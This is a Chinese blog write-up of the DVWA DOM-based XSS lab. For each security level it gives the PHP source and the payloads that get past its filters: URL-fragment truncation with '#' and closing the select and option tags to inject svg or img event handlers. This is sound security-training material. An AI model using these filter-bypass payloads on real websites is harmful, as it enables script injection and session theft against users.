XSS(DOM)

最新推荐文章于 2024-11-29 11:10:42 发布
最新推荐文章于 2024-11-29 11:10:42 发布
阅读量164 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: DVWA
本文链接:https://blog.youkuaiyun.com/curryzzb/article/details/115914357

XSS(DOM):

Low:

源代码:

<?php

# No protections, anything goes

?>

服务器端并没有写任何的php代码,处理用户输入的只有前端的js代码

做法:将English改为

在这里插入图片描述
回车,产生了弹窗

在这里插入图片描述

查看前端源代码,可以看到被写入了value中

在这里插入图片描述

Medium:

源代码:

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {//不允许使用script标签
        header ("location: ?default=English");
        exit;
    }
}

?>

stripos,stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写),格式stripos(string,find,start)。,防止了大小写绕过

代码第8行,不允许使用script标签

方法一:加#号截断,url中有一个字符为#,该字符后的数据不会发送到服务器端,从而绕过服务端过滤,构造连接

http://127.0.0.1/DVWA/vulnerabilities/xss_d/?#default=%3Cscript%3Ealert('xss')%3C/script%3E

方法二:尝试其他标签特性执行js代码

127.0.0.1/DVWA/vulnerabilities/xss_d/?default=</option></select><svg οnlοad=alert("xss")>

High:

源代码:

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

分析代码,要求default的值必须为select选择菜单中的值,使用#符号绕过就行

?default=English#</option></select><img src=xss οnerrοr=alert(/xss/)>
XSS(DOM)
kid的博客
05-05 4255
XSS(DOM) 前言 讲道理,现在我对XSS(DOM)的原理还是很迷啊,不看下js和前端的知识感觉还是很迷,不是很懂。 但是我觉得练习还是可以做的,因为看过一些大佬的文章后,感觉有成为脚本小子的能力了… XSS的原理分析与解剖(第二篇) 这篇文章前面xss反射型的时候就引用过,里面有一段介绍xss dom的,我感觉原理说的也不是很清楚,但看了它的例子后大概知道怎么去搞了… 练习 Low 这里G...
【DVWA-master】xss(DOM)(详)
Mw18211406853的博客
10-10 1133
查看源代码,会发现会含有<script的代码会出现报错,直接统一返回English,按F12查看页面的html,查看select那部分就是提交的那部分default+8,+8刚好就是等号的后面,代码会把等号后面的东西转给option,进行一系列操作,所以可以在option那里插入我们的代码,要避开被过滤可以把前面的闭合,把代码放在后面,就可以执行恶意代码了,可以看到把select和option闭合就可以了,但是不能用<script>标签了,可以用img或body标签。这里利用#的机制,绕过后台的过滤。
XSS (DOM)
kukudeshuo的博客
03-04 277
dwva之XSS (DOM) Security Level: low 查看源代码,没有进行任何保护 本意是让我选择语言,这里我们在default后面构造语句 我们查看源码,可以看到,我们的脚本插入到代码中了,所以执行了 Security Level: medium 查看源代码,利用黑名单过滤了script标签,并且不区分大小写,这里使用img标签绕过 这里并没有弹窗,我们利用开发者工具去看,发现我们的语句被插入到了value值中,但是并没有插入到option标签的值中,所以img标签并没有发起任何
DOMXSS
白帽子凯哥哥的博客
05-29 2356
DOMXSS漏洞是一种特殊类型的XSS,是基于文档对象模型 Document Object Model (DOM)的一种漏洞。DOM全称Document Object Model,是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。以一张w3c的图来说明,到底什么是domdom就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。
玩转DVWA 之XSS DOM
key01362000的博客
09-29 1204
DVWA中XSS DOM攻击
DVWA靶场XSS DOM型LOW级别演示举例
2301_77185537的博客
12-24 493
因此尝试修改URL中的default值,使它等于经典的XSS脚本payload网页弹窗。:因此我们查看网页前端的源代码,因为处理用户输入的只有前端的JavaScript代码。能够调出网页弹窗,也就能说明我们注入其他恶意的JavaScript代码也是没有问题的。:查看网站后台的PHP源代码,发现服务器端没有任何的PHP限制。:首先打开DVWA靶场XSS DOM 模块。靶场XSS DOM型模块举例。
dvwa xssDOM
最新发布
01-23
### 关于DVWA中XSS DOM漏洞的信息 在探讨DVWA(Damn Vulnerable Web Application)中的DOM型跨站脚本攻击(XSS)时,需理解DOM操作如何影响Web应用程序的安全性。DOM XSS发生在客户端JavaScript代码解析并执行来自不...
【DVWA】--- 十一、DOMXSS(XSS DOM)
qq_43168364的博客
05-31 421
XSS DOM 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法
XSS漏洞 DOM型测试 payload代码
02-26
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOMXSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
DVWA系列Web常见漏洞XSS(DOM)源码分析及漏洞利用
weixin_57641619的博客
05-24 1904
本期主要讲解什么是基于DOMXSS漏洞,XSS(DOM)漏洞攻击实例,基于DOMXSS漏洞产生的原因以及一般会在何处产生,最后讲解如何利用基于DOMXSS漏洞(XSS经典的窃取cookie等)
【网络安全】DVWA之XSSDOM)攻击姿势及解题详析合集
等风来
05-16 1万+
标签用于在 HTML 页面中嵌入 JavaScript 脚本代码,通过在浏览器中执行这些脚本来实现一些与用户交互、数据处理、动态效果等相关的功能。1.通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。语句中实现一个白名单机制,将可接受的语言作为取值,所有其他语言都会默认被转换为英语。在客户端被注释,因此注入语句不会被传入服务器端,从而达到注入效果。,则继续进行后续校验;
DOMXSS详讲
weixin_59047731的博客
11-21 3847
在网站页面中有许多元素,当页面到达浏览器时,浏览器会为页面创建一个项级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。也就是说,客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段。除了富文本的输出之外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。
Web安全基础学习:XSS跨站脚本漏洞之DOMXSS
qq_51862722的博客
06-19 2259
DOMXSS漏洞:非持久型XSS,且不与后台服务器产生数据交互,而是通过JS修改网页的DOM来执行恶意脚本进行攻击。注意,DOMXSS与反射型和存储型最大的区别在于,DOMXSS不经过服务端,全部的攻击过程都在客户端完成。
关于DOMXSS的深入解析(收藏)
热门推荐
告白的博客
01-11 1万+
很多初次接触xss的小白,尽管知道xss的三种分类,但是在DOMxss还是存在理解上的不足,这篇文章希望能帮助到更好的理解DOMxss
xssdom类型
m0_74741186的博客
10-05 771
上我们的pikachu。
DVWA靶场通关——DOMXSS漏洞
sucker的博客
11-29 3098
DOMXSSDOM-based Cross-Site Scripting,DOM XSS)是一种跨站脚本攻击(XSS)的变种,它与传统的反射型XSS(Reflected XSS)或存储型XSS(Stored XSS)有所不同,主要是发生在客户端(浏览器端),并且依赖于网页中动态的文档对象模型(DOM)结构。:如果页面存在涉及状态更改的操作(如修改密码、删除内容等),而没有对请求进行适当的防护(例如 CSRF token),攻击者可以利用该漏洞执行伪造的操作,导致用户的会话受到攻击。
【DVWA】7. XSS DOM(Low+Medium)
Zichel77的博客
12-12 903
于是选择采用img标签,payload为这段代码是一个 PHP 脚本,用于检查和处理传递给网页的 GET 请求参数中的 default 值。可以发现可以回显,说明XSS语句被包含在option标签里,但是也没有xss弹窗。可以看到还是起不了作用,这是因为select标签的存在。要让img标签起作用,就想办法去闭合option。可以看到XSS漏洞点是在option标签当中的。可以看出没有给任何的过滤。此时客户端的标签逻辑为。
DVWA之XSSDOM
ANDTM的博客
06-08 392
DOM就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射型xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值